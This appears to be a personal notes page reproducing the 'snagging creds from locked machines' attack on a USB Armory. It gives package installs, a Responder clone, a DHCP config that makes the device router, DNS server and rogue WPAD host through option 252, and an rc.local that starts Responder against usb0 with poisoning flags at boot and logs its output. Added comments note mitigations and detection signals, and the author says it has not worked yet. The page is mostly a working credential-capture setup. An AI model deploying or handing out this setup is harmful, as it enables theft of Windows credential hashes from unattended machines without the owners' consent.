Stealing Windows Credentials with USB Armory


These are just notes from my attempt to reproduce the exploit described in this post: https://room362.com/post/2016/snagging-creds-from-locked-machines/

I haven’t managed to get it working yet, but I’m keeping these notes in case I ever need to try it again.

# Refresh the package index, then upgrade every installed package to the
# newest version the configured repositories offer.
sudo apt-get update
sudo apt-get upgrade

Certificates and date

# CA bundle (plus the ssl-cert helper) so the HTTPS downloads below
# (git clone, pip) can verify server certificates.
sudo apt-get install ca-certificates ssl-cert
# Time sync: certificate validation depends on a roughly correct clock,
# which is presumably why these two are grouped under "Certificates and
# date" — confirm.
sudo apt-get install ntp ntpdate

Python

# Python 2 toolchain (python, python-pip, python-dev are the Python 2
# package names on Debian-based systems), git for the clone below, screen
# for the detached session started from rc.local, sqlite3 presumably for
# Responder's database — confirm.
sudo apt-get install -y python git python-pip python-dev screen sqlite3
# -H sets HOME to root's home, so pip's cache and config belong to root
# rather than to the invoking user.
sudo -H pip install --upgrade pip
# Installed system-wide. NOTE(review): pycrypto has been unmaintained
# upstream for years; anything that depends on it is a supply-chain risk.
sudo -H pip install pycrypto

Responder

# Unpinned clone of the default branch: whatever HEAD is at clone time is
# what runs, so two builds of this device can differ. Pin a commit or tag
# if the build needs to be reproducible. rc.local expects the checkout at
# /root/responder, so this is presumably run from /root — confirm.
git clone https://github.com/spiderlabs/responder

DHCP configuration

# Keep a pristine copy of the stock config before editing it.
sudo cp /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.original

# Replace the contents with the file shown below.
sudo vim /etc/dhcp/dhcpd.conf
/etc/dhcp/dhcpd.conf
# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;

# option definitions common to all supported networks...
# Both the domain and the DNS server are handed out by this device itself:
# 172.16.0.1 is also the router address in the subnet block below, so every
# client name lookup goes to the device.
option domain-name "domain.local";
option domain-name-servers 172.16.0.1;

# Lease lifetimes in seconds (10 minutes by default, 2 hours at most).
default-lease-time 600;
max-lease-time 7200;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# wpad
# Declares DHCP option 252 as a text option. Option 252 carries the WPAD
# (proxy auto-discovery) URL: hosts with "automatically detect settings"
# enabled fetch the advertised script and honour whatever proxy it names.
# Mitigation on the client side is to disable WPAD auto-detection on
# managed hosts; a DHCP offer carrying option 252 from a newly attached
# USB network adapter is a useful detection signal.
option local-proxy-config code 252 = text;

# A slightly different configuration for an internal subnet.
# One /24 served on whichever interface holds an address in it (presumably
# usb0, the interface rc.local points Responder at — confirm). The device
# takes .1 and advertises itself as router, DNS server and WPAD host.
subnet 172.16.0.0 netmask 255.255.255.0 {
  range 172.16.0.2 172.16.0.254;
  option routers 172.16.0.1;
  option local-proxy-config "http://172.16.0.1/wpad.dat";
}
# Back up the stock rc.local before replacing it.
sudo cp /etc/rc.local /etc/rc.local.original

# Replace the contents with the file shown below.
sudo vim /etc/rc.local
/etc/rc.local
#!/bin/sh -e
# Boot-time startup for the device: reset the DHCP lease database, start
# dhcpd, then start Responder in a detached screen session.
# The -e in the shebang makes the shell exit at the first failing command,
# so if dhcpd fails to start the Responder line below is never reached. It
# only applies when the file is executed directly (as init typically does
# with rc.local), not when it is sourced.

# Clear leases
# Recreate the lease database empty on every boot, so nothing from a
# previous session carries over.
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases

# Start DHCP server
# No interface is given, so dhcpd serves whichever interfaces have an
# address inside a subnet declared in dhcpd.conf (presumably usb0 — confirm).
/usr/sbin/dhcpd

# Start Responder
# Detached screen session named "responder", running Responder from the
# /root/responder checkout against usb0. Since rc.local runs as root,
# /root/.screenrc (shown below) presumably applies, in which case the
# session output is logged under /root/logs/ — that directory and the
# detached "responder" session are the on-device artifacts to look for.
/usr/bin/screen -dmS responder bash -c 'cd /root/responder/; python Responder.py -I usb0 -f -w -r -d -F'

exit 0
/root/.screenrc
# Logging
# Turn logging on for every new window, and name each log by host (%H),
# window number (%n), date (%Y%m%d), time (%0c:%s, which looks like
# HH:MM:SS — confirm) and window title (%t).
# NOTE(review): screen expands $VAR in .screenrc and treats letters, digits
# and underscore as part of the variable name, so `$USER_` is looked up as a
# variable named USER_ (almost certainly unset) rather than USER followed by
# an underscore; `${USER}_` is probably what was intended — confirm against
# the filenames actually produced.
deflog on
logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log